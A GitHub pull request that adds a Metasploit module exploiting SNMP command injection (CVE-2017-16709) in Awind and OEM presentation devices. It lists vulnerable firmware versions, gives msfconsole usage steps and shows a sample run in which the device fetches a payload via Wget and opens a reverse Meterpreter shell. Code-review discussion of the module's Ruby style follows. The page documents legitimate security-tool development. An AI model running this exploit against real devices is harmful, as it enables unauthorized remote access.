Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

CVE-2017-16709 - Awind SNMP RCE #11643

Merged
merged 15 commits into from Sep 4, 2019

Conversation

@QKaiser
Copy link
Contributor

commented Mar 27, 2019

Description

This module exploits a vulnerability found in AwindInc and OEM'ed products where untrusted inputs are fed to ftpfw.sh system command, leading to command injection.

Note: a valid SNMP read-write community is required to exploit this vulnerability.

Vulnerable Devices

The following devices are known to be affected by this issue:

  • Crestron Airmedia AM-100 <= version 1.5.0.4
  • Crestron Airmedia AM-101 <= version 2.5.0.12
  • Awind WiPG-1600w <= version 2.0.1.8
  • Awind WiPG-2000d <= version 2.1.6.2
  • Barco wePresent 2000 <= version 2.1.5.7
  • Newline Trucast 2 <= version 2.1.0.5
  • Newline Trucast 3 <= version 2.1.3.7

Other devices might be affected by the same issue but lack of access to firmware forbids me from confirming that. See https://github.com/QKaiser/awind-research for full list of similar devices.

Verification steps

  1. Start msfconsole
  2. Do: use exploit/linux/snmp/awind_snmp_exec
  3. Do: set payload linux/armle/meterpreter/reverse_tcp
  4. Do: set RHOST [IP]
  5. Do: set LHOST [IP]
  6. Do: run

You should get a session.

Sample run

msf5 > use exploit/linux/snmp/awind_snmp_exec
msf5 exploit(linux/snmp/awind_snmp_exec) > set payload linux/armle/meterpreter/reverse_tcp 
payload => linux/armle/meterpreter/reverse_tcp
msf5 exploit(linux/snmp/awind_snmp_exec) > set RHOSTS 192.168.100.2
RHOSTS => 192.168.100.2
msf5 exploit(linux/snmp/awind_snmp_exec) > set LHOST 192.168.100.1
LHOST => 192.168.100.1
msf5 exploit(linux/snmp/awind_snmp_exec) > check

[*] Target system is Crestron Electronics AM-100 (Version 2.6.0.6)
[+] 192.168.100.2:161 The target is vulnerable.
msf5 exploit(linux/snmp/awind_snmp_exec) > run

[*] Started reverse TCP handler on 192.168.100.1:4444 
[*] Using URL: http://0.0.0.0:8080/u70HALC
[*] Local IP: http://192.168.1.10:8080/u70HALC
[*] Injecting payload
[*] Injection successful
[*] Triggering call
[*] Trigger successful
[*] Client 192.168.100.2 (Wget) requested /u70HALC
[*] Sending payload to 192.168.100.2 (Wget)
[*] Sending stage (806872 bytes) to 192.168.100.2
[*] Command Stager progress - 100.00% done (113/113 bytes)
[*] Meterpreter session 2 opened (192.168.100.1:4444 -> 192.168.100.2:38009) at 2019-03-28 11:01:41 +0100
[*] Server stopped.

meterpreter > sysinfo
Computer     : Crestron.AirMedia-1.1.wm8750
OS           :  (Linux 2.6.32.9-default)
Architecture : armv6l
BuildTuple   : armv5l-linux-musleabi
Meterpreter  : armle/linux

References

@wvu-r7

This comment has been minimized.

Copy link
Contributor

commented Mar 27, 2019

Nice find! I'd add a CmdStager target if possible.

@cbrnrd
Copy link
Contributor

left a comment

Small things

# AM-100 and AM-101 considered EOL, no fix so no need to check version.
if sys_description.include? "Crestron Electronics AM-100" or sys.description.include? "Crestron Electronics AM-101"
return Exploit::CheckCode::Vulnerable
end

This comment has been minimized.

Copy link
@cbrnrd

cbrnrd Mar 28, 2019

Contributor

Shrink this down to one line (unless officer RuboCop gets mad):

return Exploit::CheckCode::Vulnerable if sys_description.include? "Crestron Electronics AM-100" or sys.description.include? "Crestron Electronics AM-101"

Also probably want to replace or with ||

This comment has been minimized.

Copy link
@QKaiser

QKaiser Mar 28, 2019

Author Contributor

See fbaebc1

This comment has been minimized.

Copy link
@bcoles

bcoles Mar 28, 2019

Contributor

|| is preferred over or, which requires using () for the include?() calls.

A regex would decrease line length and duplication:

return CheckCode::Vulnerable if sys_description =~ /Crestron Electronics (AM-100|AM-101)/

Also, Exploit:: prefix is redundant in Exploit context.

Better yet, based on your TODO, something like this:

model = sys_description.scan(/Crestron Electronics (AM-100|AM-101)/).flatten.first
case model
when 'AM-100', 'AM-101'
  return CheckCode::Vulnerable
when 'some other model'
  return CheckCode::Vulnerable
else
  return CheckCode::Safe
end

This comment has been minimized.

Copy link
@QKaiser

QKaiser Apr 30, 2019

Author Contributor

See 8ec5a12

print_error("#{ip} Connection refused.")
rescue SNMP::UnsupportedVersion
print_error("#{ip} Unsupported SNMP version specified. Select from '1' or '2c'.")
rescue ::Interrupt

This comment has been minimized.

Copy link
@cbrnrd

cbrnrd Mar 28, 2019

Contributor

What would cause this except a Ctrl+c? If it's just that then this is unnecessary.

This comment has been minimized.

Copy link
@QKaiser

QKaiser Mar 28, 2019

Author Contributor

I based my code on auxiliary/scanner/snmp/snmp_enum (see https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/scanner/snmp/snmp_enum.rb#L870), but I'll be happy to remove it if not required.

This comment has been minimized.

Copy link
@QKaiser

QKaiser Apr 30, 2019

Author Contributor

@bcoles what do you think ? Should I follow snmp_enum pattern or simply remove the interrupt catch ?

print_error("#{ip} Connection refused.")
rescue SNMP::UnsupportedVersion
print_error("#{ip} Unsupported SNMP version specified. Select from '1' or '2c'.")
rescue ::Interrupt

This comment has been minimized.

Copy link
@cbrnrd

cbrnrd Mar 28, 2019

Contributor

Same as above comment

This comment has been minimized.

Copy link
@QKaiser

QKaiser Mar 28, 2019

Author Contributor

See above.

modules/exploits/linux/snmp/awind_snmp_exec.rb Outdated Show resolved Hide resolved
print_error("#{ip} Connection refused.")
rescue SNMP::UnsupportedVersion
print_error("#{ip} Unsupported SNMP version specified. Select from '1' or '2c'.")
rescue ::Interrupt

This comment has been minimized.

Copy link
@cbrnrd

cbrnrd Mar 28, 2019

Contributor

Same as above comment

modules/exploits/linux/snmp/awind_snmp_exec.rb Outdated Show resolved Hide resolved
modules/exploits/linux/snmp/awind_snmp_exec.rb Outdated Show resolved Hide resolved
print_error("#{ip} Unsupported SNMP version specified. Select from '1' or '2c'.")
rescue ::Interrupt
raise $!
rescue ::Exception => e

This comment has been minimized.

Copy link
@cbrnrd

cbrnrd Mar 28, 2019

Contributor

It's generally bad practice to catch Exception unless there is a specific reason to do so. Catch StandardError instead.

This comment has been minimized.

Copy link
@cbrnrd

cbrnrd Mar 28, 2019

Contributor

This applies to all times you catch ::Exception

This comment has been minimized.

Copy link
@QKaiser

QKaiser Mar 28, 2019

Author Contributor

I based my code on auxiliary/scanner/snmp/snmp_enum (see https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/scanner/snmp/snmp_enum.rb#L872). Once again, happy if it safe to remove it :)

This comment has been minimized.

Copy link
@QKaiser

QKaiser Apr 30, 2019

Author Contributor

@bcoles what do you think ? Should I follow snmp_enum pattern or simply remove the general exception handler ?

@QKaiser

This comment has been minimized.

Copy link
Contributor Author

commented Mar 28, 2019

Nice find! I'd add a CmdStager target if possible.

See cbcc2f2

@wvu-r7

This comment has been minimized.

Copy link
Contributor

commented Mar 28, 2019

@QKaiser: I meant just add a CmdStager target. ARCH_CMD is valuable, too.

@QKaiser

This comment has been minimized.

Copy link
Contributor Author

commented Mar 28, 2019

@wvu-r7 I looked around for inspiration and fixed the module to support both ARCH_ARMLE and ARCH_CMD using modules/exploit/linux/http/axis_srv_parhand_rce as a template.

Let me know what you think.

QKaiser and others added 2 commits Jun 25, 2019
Fix disclosure date format.
Co-Authored-By: @shellfail <jrobles@rapid7.com>
@space-r7

This comment has been minimized.

Copy link
Contributor

commented Sep 3, 2019

Are there any outstanding changes left for this module? I did a once-over, and I have no suggestions for improvements.

Hey, @QKaiser, I'm not sure that we have any of these vulnerable devices so could you send a PCAP to msfdev[at]metasploit.com when you have some time? Thank you!

@QKaiser

This comment has been minimized.

Copy link
Contributor Author

commented Sep 3, 2019

Are there any outstanding changes left for this module? I did a once-over, and I have no suggestions for improvements.

I don't think so.

Hey, @QKaiser, I'm not sure that we have any of these vulnerable devices so could you send a PCAP to msfdev[at]metasploit.com when you have some time? Thank you!

Sure. I should be able to send a capture in the coming days, will notify you here when it's done :)

@space-r7

This comment has been minimized.

Copy link
Contributor

commented Sep 3, 2019

Sure. I should be able to send a capture in the coming days, will notify you here when it's done :)

Awesome! Thanks!

@space-r7 space-r7 self-assigned this Sep 3, 2019

@QKaiser

This comment has been minimized.

Copy link
Contributor Author

commented Sep 4, 2019

@space-r7 Just sent out the traffic capture ;-)

@space-r7

This comment has been minimized.

Copy link
Contributor

commented Sep 4, 2019

@space-r7 Just sent out the traffic capture ;-)

Got it, thanks!

space-r7 added a commit that referenced this pull request Sep 4, 2019

@space-r7 space-r7 merged commit 94dd2b1 into rapid7:master Sep 4, 2019

3 checks passed

Metasploit Automation - Sanity Test Execution Successfully completed all tests.
Details
Metasploit Automation - Test Execution Successfully completed all tests.
Details
continuous-integration/travis-ci/pr The Travis CI build passed
Details
msjenkins-r7 added a commit that referenced this pull request Sep 4, 2019
@space-r7

This comment has been minimized.

Copy link
Contributor

commented Sep 4, 2019

Release Notes

The AwindInc SNMP Service Command Injection module has been added to the framework. It exploits a vulnerability found in AwindInc and OEM'ed products where untrusted inputs are fed to ftpfw.sh system command, which leads to command injection.

@tdoan-r7 tdoan-r7 added the rn-modules label Sep 9, 2019

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Projects
None yet
7 participants
You can’t perform that action at this time.